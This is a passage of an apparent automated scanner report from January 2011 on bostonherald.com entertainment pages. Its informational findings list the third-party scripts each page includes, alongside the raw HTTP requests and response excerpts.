Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.621. http://www.bostonherald.com/entertainment/contests/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/contests/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /entertainment/contests/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:08:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.622. http://www.bostonherald.com/entertainment/fashion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/fashion/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/fashion/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:14:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.623. http://www.bostonherald.com/entertainment/food_dining/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/food_dining/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/food_dining/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.624. http://www.bostonherald.com/entertainment/health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/health/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/health/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:13:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.625. http://www.bostonherald.com/entertainment/horoscope/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/horoscope/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /entertainment/horoscope/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.626. http://www.bostonherald.com/entertainment/lifestyle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/lifestyle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/lifestyle/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.627. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.628. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:08:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 50051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
